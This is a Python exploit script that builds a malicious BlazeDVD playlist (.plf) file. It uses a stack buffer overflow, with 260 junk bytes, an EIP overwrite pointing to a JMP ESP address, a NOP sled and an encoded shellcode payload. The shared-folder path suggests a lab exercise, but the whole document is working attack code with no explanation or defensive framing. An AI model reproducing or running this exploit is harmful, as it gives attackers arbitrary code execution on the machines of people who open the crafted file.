blazedvd-exploit.py

#!/usr/bin/env python3

payload_loc = "/media/sf_VM_Shared/BlazeDVD/exploit.plf"
badchars = b"\x00\x0a\x1a"

file = open(payload_loc, "wb")

buf = b""
buf += b"A"*260 # junk
buf += b"\x53\x93\x42\x7e" # EIP overwrite with JMP ESP
buf += b"\x90"*50 # NOP sled for ESP and decoder
buf += b"\xbe\xb8\x39\xc1\x59\xd9\xc8\xd9\x74\x24\xf4\x5b\x31"
buf += b"\xc9\xb1\x31\x83\xc3\x04\x31\x73\x0f\x03\x73\xb7\xdb"
buf += b"\x34\xa5\x2f\x99\xb7\x56\xaf\xfe\x3e\xb3\x9e\x3e\x24"
buf += b"\xb7\xb0\x8e\x2e\x95\x3c\x64\x62\x0e\xb7\x08\xab\x21"
buf += b"\x70\xa6\x8d\x0c\x81\x9b\xee\x0f\x01\xe6\x22\xf0\x38"
buf += b"\x29\x37\xf1\x7d\x54\xba\xa3\xd6\x12\x69\x54\x53\x6e"
buf += b"\xb2\xdf\x2f\x7e\xb2\x3c\xe7\x81\x93\x92\x7c\xd8\x33"
buf += b"\x14\x51\x50\x7a\x0e\xb6\x5d\x34\xa5\x0c\x29\xc7\x6f"
buf += b"\x5d\xd2\x64\x4e\x52\x21\x74\x96\x54\xda\x03\xee\xa7"
buf += b"\x67\x14\x35\xda\xb3\x91\xae\x7c\x37\x01\x0b\x7d\x94"
buf += b"\xd4\xd8\x71\x51\x92\x87\x95\x64\x77\xbc\xa1\xed\x76"
buf += b"\x13\x20\xb5\x5c\xb7\x69\x6d\xfc\xee\xd7\xc0\x01\xf0"
buf += b"\xb8\xbd\xa7\x7a\x54\xa9\xd5\x20\x32\x2c\x6b\x5f\x70"
buf += b"\x2e\x73\x60\x24\x47\x42\xeb\xab\x10\x5b\x3e\x88\xff"
buf += b"\xb9\xeb\xe4\x97\x67\x7e\x45\xfa\x97\x54\x89\x03\x14"
buf += b"\x5d\x71\xf0\x04\x14\x74\xbc\x82\xc4\x04\xad\x66\xeb"
buf += b"\xbb\xce\xa2\x88\x5a\x5d\x2e\x61\xf9\xe5\xd5\x7d"

file.write(buf)